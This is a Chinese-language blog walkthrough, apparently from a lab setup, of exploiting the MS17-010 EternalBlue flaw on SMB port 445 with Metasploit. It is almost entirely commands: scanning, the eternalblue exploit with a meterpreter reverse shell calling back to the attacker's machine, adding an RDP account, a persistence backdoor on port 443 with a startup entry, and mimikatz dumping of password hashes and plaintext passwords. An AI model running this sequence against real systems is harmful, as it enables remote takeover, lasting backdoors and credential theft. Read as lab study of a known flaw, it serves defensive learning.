445永痕之蓝利用

arp-scan -l //扫描本地IP 分析得到靶机IP地址

nmap -A 192.168.232.131 扫描目标开放端口

发现目标开放445段端口

msfconsole //进入msfconsole

search ms17_010 //查找永恒之蓝攻击模块

0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption

1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution

3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection

先利用 永痕之蓝扫描工具探测目标是否有利用漏洞

use 3 //全写完太长了 直接use 3

show options //查看配置

set rhosts //设置目标IP地址

run

发现目标主机存在利用漏洞 直接利用exp进行攻击

返回上一级目录

use 0 // 0 = exploit/windows/smb/ms17_010_eternalblue

set payload windows/x64/meterpreter/reverse_tcp //设置荷载 成功之后会反向连接到本地

set rhosts // 设置目标地址

set lhost //设置本地地址

run

成功打进去

run post/windows/gather/checkvm //检查是否为虚拟机

getuid //检查权限

sysinfo //查看主机信息

run post/windows/manage/enable_rdp username=123 password=123 //添加一个账 密码为123的用户(默认为administrator)

shell >>>net user //查看用户是否添加

run post/windows/gather/enum_applications //查看安装软件

run post/multi/recon/local_exploit_suggester //获取补丁信息

run persistence -U -i 10 -p 443 -r 192.168.232.128//创建一个端口443 IP地址为 192.168.232.128 通讯刷新时间为10秒 同时添加启动项

background

use exploit/multi/handler //连接后门测试

set payload windows/meterpreter/reverse_tcp //设置payload反向连接

set lhost 192.168.232.128 //设置上线地址

set LPORT 443 //设置上线端口 跟上面监听端口一样

获取W7密码

apt-get install mimikatz //安装mimikatz

load mimikatz //加载模块

msv //获取登录密码的hash值

kerberos //获取明文密码

进入shell

REG ADD HKLMSYSTEMCurrentControlSetControlTerminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

rdesktop 192.168.1.128 -u Administrator -p ms17-010! //连接w7

声明:本站部分文章及图片源自用户投稿,如本站任何资料有侵权请您尽早请联系jinwei@zod.com.cn进行处理,非常感谢!

上一篇 2021年11月16日
下一篇 2021年11月16日

相关推荐